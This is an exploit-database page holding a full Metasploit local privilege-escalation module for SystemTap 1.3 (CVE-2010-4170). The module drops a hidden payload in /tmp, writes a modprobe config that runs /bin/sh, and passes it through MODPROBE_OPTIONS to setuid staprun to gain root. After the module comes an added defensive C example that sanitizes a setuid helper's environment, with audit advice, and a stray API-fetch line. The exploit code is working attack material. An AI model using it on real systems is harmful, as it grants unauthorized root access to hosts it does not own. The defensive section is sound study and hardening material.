"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)"

Author: Metasploit
Platform: linux
Release date: 2019-04-19

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting a
        vulnerability in the `staprun` executable included with SystemTap
        version 1.3.

        The `staprun` executable does not clear environment variables prior to
        executing `modprobe`, allowing an arbitrary configuration file to be
        specified in the `MODPROBE_OPTIONS` environment variable, resulting
        in arbitrary command execution with root privileges.

        This module has been tested successfully on:

        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy', # Discovery and exploit
          'bcoles'         # Metasploit
        ],
      'DisclosureDate' => '2010-11-17',
      'References'     =>
        [
          ['BID', '44914'],
          ['CVE', '2010-4170'],
          ['EDB', '15620'],
          ['URL', 'https://securitytracker.com/id?1024754'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
          ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
          ['URL', 'https://bugs.launchpad.net/bugs/677226'],
          ['URL', 'https://www.debian.org/security/2011/dsa-2348']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def staprun_path
    datastore['STAPRUN_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    # On some systems, staprun execution is restricted to stapusr group:
    # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
    unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
      vprint_error "#{staprun_path} is not executable"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is executable"

    unless setuid? staprun_path
      vprint_error "#{staprun_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{staprun_path} is setuid"

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    config_path = "#{base_dir}/#{payload_name}.conf"
    upload config_path, "install uprobes /bin/sh"

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
    vprint_line res
  end
end
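The module description states the root cause: `staprun` runs `modprobe` without clearing its environment, so a caller-supplied `MODPROBE_OPTIONS` reaches a root-privileged `modprobe`. The following is an added example, written for this page and not taken from SystemTap or from the Metasploit module above, of the defensive pattern a setuid helper should use when it must spawn a subprocess: discard the inherited environment, rebuild a minimal one from an allow-list, pin PATH to a fixed value, and exec the child by absolute path. The allow-list (`LANG`, `TZ`), the fixed PATH string and the `/sbin/modprobe` location are assumptions chosen for the example; the sample parent environment in `main` is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed fixed PATH for the child. The parent's PATH is never trusted. */
#define SAFE_PATH "PATH=/sbin:/usr/sbin:/bin:/usr/bin"

/* Assumed allow-list of variables a child may inherit. Tool-option
 * variables such as MODPROBE_OPTIONS and loader-influencing variables
 * are deliberately absent: anything not listed here is dropped. */
static const char *const allowed[] = { "LANG", "TZ", NULL };

/* Return 1 if the NAME part of a "NAME=value" entry is on the allow-list. */
static int allowed_name(const char *entry) {
    const char *eq = strchr(entry, '=');
    if (!eq) return 0;                       /* malformed entry: drop it */
    size_t n = (size_t)(eq - entry);
    for (size_t i = 0; allowed[i]; i++)
        if (strlen(allowed[i]) == n && strncmp(allowed[i], entry, n) == 0)
            return 1;
    return 0;
}

/* Build a sanitized environment in `out` (capacity `cap`, NULL included)
 * from the parent's `in`. SAFE_PATH always comes first; only allow-listed
 * entries follow. Returns the entry count (excluding NULL) or -1 on overflow. */
int sanitize_env(char *const in[], char *out[], size_t cap) {
    size_t n = 0;
    if (cap < 2) return -1;
    out[n++] = (char *)SAFE_PATH;
    for (size_t i = 0; in && in[i]; i++) {
        if (!allowed_name(in[i])) continue;
        if (n + 1 >= cap) return -1;         /* keep room for the NULL */
        out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* Return 1 if some entry of `env` sets the variable `name`. */
int env_has(char *const env[], const char *name) {
    size_t len = strlen(name);
    for (size_t i = 0; env && env[i]; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=')
            return 1;
    return 0;
}

/* Hardened launch: absolute binary path, fixed argv, sanitized envp via
 * execve(). The vulnerable pattern is an exec that inherits `environ`
 * (for example execvp()), which is how MODPROBE_OPTIONS='-C <file>'
 * reached a root-privileged modprobe. Requires privileges to actually
 * load a module; shown here for the launch pattern only. */
int run_modprobe_clean(const char *module, char *const parent_env[]) {
    char *env[32];
    if (sanitize_env(parent_env, env, 32) < 0) return -1;
    char *const argv[] = { "/sbin/modprobe", (char *)module, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, env);
        _exit(127);                           /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed parent environment of the kind an unprivileged caller
     * could hand to a setuid helper. */
    char *parent[] = { "PATH=/tmp:/bin",
                       "MODPROBE_OPTIONS=-C /tmp/some.conf",
                       "LANG=C", "HOME=/home/user", NULL };
    char *child[16];
    int n = sanitize_env(parent, child, 16);
    printf("%d entries survive sanitization:\n", n);
    for (int i = 0; i < n; i++) printf("  %s\n", child[i]);
    return 0;
}
```

Note that the module's `check` only confirms that `staprun` is executable and setuid; on a hardened host the same binary may be mode 4110 owned by root:stapusr (as the comment in `check` shows), so a defender's audit should verify both the file mode and the installed package version rather than the setuid bit alone.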
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46730/?format=json')
